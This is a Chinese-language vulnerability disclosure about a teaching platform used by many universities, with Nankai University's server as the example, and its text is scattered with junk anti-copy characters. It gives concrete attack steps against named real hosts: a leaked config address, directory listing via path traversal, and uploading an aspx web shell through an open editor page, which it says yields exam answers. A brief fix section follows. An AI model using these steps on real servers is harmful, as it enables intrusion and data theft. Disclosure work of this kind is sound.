好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
! G1 C) k! i6 W+ O4 S) J
% @ d: N g! e+ m$ t详细说明:8 X% k; d. d$ Y6 w
2 h# Y& U" S/ O5 Y( k以南开大学的为例:
4 i @0 p: I, {9 f8 l: B, Q7 [9 S, K/ P% Ohttp://222.30.60.3/NPELS
6 O7 B1 x: e8 { R) YNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
5 Y- q; {3 N2 Y<setting name="Update_CommonSvr_CommonService" serializeAs="String">5 U/ V, l. @/ @4 B0 M
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
6 C7 p; K3 q3 J1 @# k8 |7 ]</setting>
7 ]' O/ c( ~ c0 J: G2 X8 ]. L X3 h1 q及版本号
( U2 o2 }: A$ H6 ]9 v. ]+ q<add key="TVersion" value="1, 0, 0, 2187">
; D" D; y1 [3 f0 B! d1 L$ }$ J</add>3 _5 [, n# o+ I/ z$ Y* Y! h0 }* c
直接访问
/ U7 G( E) L& f: Yhttp://222.30.60.3/NPELS/CommonService.asmx) U1 }3 g8 V9 ?. |9 C8 v6 v8 Y6 d0 c
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
; L0 v4 Y# y4 }; Q6 M3 Uhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187/ ]4 {# s. D' U) f
进一步列目录(返回的网页很大,可以直接 wget 下来), t1 C. R1 r4 G# x' \; M
http://222.30.60.3/NPELS/CommonS ... List?version=../../% l4 G8 \- Q. B A1 x
- |0 b3 `# F) G t发现2 \! @) P; Q* O& T) g/ ~
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
6 x3 O, Z$ q7 W8 B4 a0 P3 ?: r! k可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
- [2 M$ L/ e+ F上传后继续列目录找到木马地址直接访问即可
# p1 J1 `& b6 c! R% L1 V% r ( D9 p5 q- d2 ~9 Y- A4 [' V
OOXX7 g, l! O' \% o! F k
5 [2 b( l3 d/ p1 g" TGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法8 Q4 M1 [ x. W% p7 r% d
漏洞证明:
1 t/ B# \5 k- c! U$ p, a
- X' ]( m! K+ k- @) c列目录:8 Y0 X7 L$ ^# H0 k X7 l9 [
http://222.30.60.3/NPELS/CommonS ... List?version=../../
4 L* w9 t) [5 g+ `文件上传:
) Q# p+ ~5 a& |0 `http://222.30.60.3/npelsv/editor/editor.htm
$ b& p/ P' b0 c# }1 |/ n( a
" ^* H8 B0 L) Z7 V' S上传木马:" ^/ y& u5 }2 s" ]: I
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx$ N1 l8 e2 ^8 c& k) V! w
) {, U9 i. Z& m+ {# M; z6 K修复方案:8 _9 X2 D$ l# U& k5 a
好像考试系统必须使用 CommonService.asmx+ N5 Z8 u' }& A& Z5 L9 `
最好配置文件加密或者用别的方式不让它泄露出来
6 D, \$ ~& _! ?; T4 j2 k; `1 ^! o并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
7 N5 g# L x4 Q |